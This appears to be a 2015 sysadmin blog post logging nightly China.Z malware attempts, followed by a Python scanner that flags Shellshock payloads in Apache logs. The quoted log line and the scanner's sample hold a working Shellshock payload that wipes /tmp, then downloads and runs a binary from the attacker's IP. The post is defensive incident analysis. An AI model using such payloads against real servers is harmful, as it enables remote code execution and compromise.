Wednesday, 6 May 2015

China.Z still out there

I am still seeing China.Z malware or variants hitting the system on a regular basis (1 to 4 each night). All attack vectors look the same; only the naming changes from time to time.

  • /tmp/China.Z-vfxr
  • /tmp/China.Z-boxo
  • /tmp/China.Z-rnxl
  • etc.

All of them are detected by ClamAV:

714.64.1: Linux.Trojan.IptabLex FOUND

The corresponding Apache access-log entry is below. The request itself is a plain GET for /, but both the Referer and User-Agent fields carry a Shellshock (CVE-2014-6271) payload: a bash function definition "() { :; };" followed by the commands to execute. A bash-backed CGI handler would export those headers as environment variables and run the trailing commands, which wipe /tmp, write a one-shot dropper script /tmp/Run.sh that fetches the binary from port 911 on the attacking host, make both files executable, run the binary, and remove the script.

121.207.230.74 - - [07/May/2015:01:50:01 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;echo /tmp/China.Z-vgtd >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

Refer to VirusTotal for details on the source IP.
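As an added example (not part of the original post), here is a small Python scanner that parses Apache combined-format access-log lines, flags the Shellshock function-definition pattern in the Referer and User-Agent fields, and pulls out the download URL and drop path so the nightly hits can be tallied instead of read by hand. The log sample is constructed: the first entry reproduces the line quoted above, the other two are made up for contrast (a benign request and a Shellshock variant with a different function body).

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent".
# Quotes inside the Referer/User-Agent fields are logged as \" so those field regexes allow escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"$'
)

# Shellshock (CVE-2014-6271) trigger: an exported function definition "() { ...; };" followed
# by trailing commands. The loose body match also catches variants such as "() { ignored; };".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
# Fetch-and-run indicators seen in the payload: the download URL and the -O/-o output path.
URL_RE = re.compile(r'(?:wget|curl)[^;|&]*?(https?://\S+)')
DEST_RE = re.compile(r'-[oO]\s+(\S+)')


@dataclass
class Finding:
    ip: str
    timestamp: str
    status: int
    fields: List[str] = field(default_factory=list)   # headers that carried the payload
    download_url: Optional[str] = None
    dropped_path: Optional[str] = None


def unescape(logged: str) -> str:
    """Undo Apache's \\" and \\\\ escaping so the payload reads as the attacker sent it."""
    return logged.replace('\\"', '"').replace('\\\\', '\\')


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per log line whose Referer or User-Agent carries a Shellshock payload."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        m = LOG_RE.match(raw.strip())
        if not m:
            continue                      # not combined format; skip rather than guess
        hit: Optional[Finding] = None
        for name in ("referer", "user_agent"):
            payload = unescape(m.group(name))
            if not SHELLSHOCK_RE.search(payload):
                continue
            if hit is None:
                hit = Finding(m.group("ip"), m.group("ts"), int(m.group("status")))
                findings.append(hit)
            hit.fields.append(name)
            if hit.download_url is None and (u := URL_RE.search(payload)):
                hit.download_url = u.group(1)
            if hit.dropped_path is None and (d := DEST_RE.search(payload)):
                hit.dropped_path = d.group(1)
    return findings


# Constructed sample. The first entry reproduces the access-log line quoted in the post; the
# other two are made up: a benign request and a Shellshock variant with a different function body.
PAYLOAD = (
    r'() { :; }; /bin/bash -c \"rm -rf /tmp/*;'
    r'echo wget http://121.207.230.74:911/714.64 -O /tmp/China.Z-vgtd >> /tmp/Run.sh;'
    r'echo echo By China.Z >> /tmp/Run.sh;'
    r'echo chmod 777 /tmp/China.Z-vgtd >> /tmp/Run.sh;'
    r'echo /tmp/China.Z-vgtd >> /tmp/Run.sh;'
    r'echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;'
    r'chmod 777 /tmp/Run.sh;/tmp/Run.sh\"'
)
SAMPLE_LOG = "\n".join([
    f'121.207.230.74 - - [07/May/2015:01:50:01 +0200] "GET / HTTP/1.1" 404 442 "{PAYLOAD}" "{PAYLOAD}"',
    '198.51.100.7 - - [07/May/2015:02:10:33 +0200] "GET /index.html HTTP/1.1" 200 1532 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [07/May/2015:03:41:12 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 200 87 "-" '
    '"() { ignored; }; /bin/bash -c \\"id\\""',
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} status={f.status} via={','.join(f.fields)} "
              f"url={f.download_url} drop={f.dropped_path}")
```

Run it against a real access log with `scan_log(open("/var/log/apache2/access.log").read())`; the download URLs it extracts are what you would feed to VirusTotal or block at the egress firewall, and the dropped paths give ClamAV (or a cron job) an exact list of files to check in /tmp.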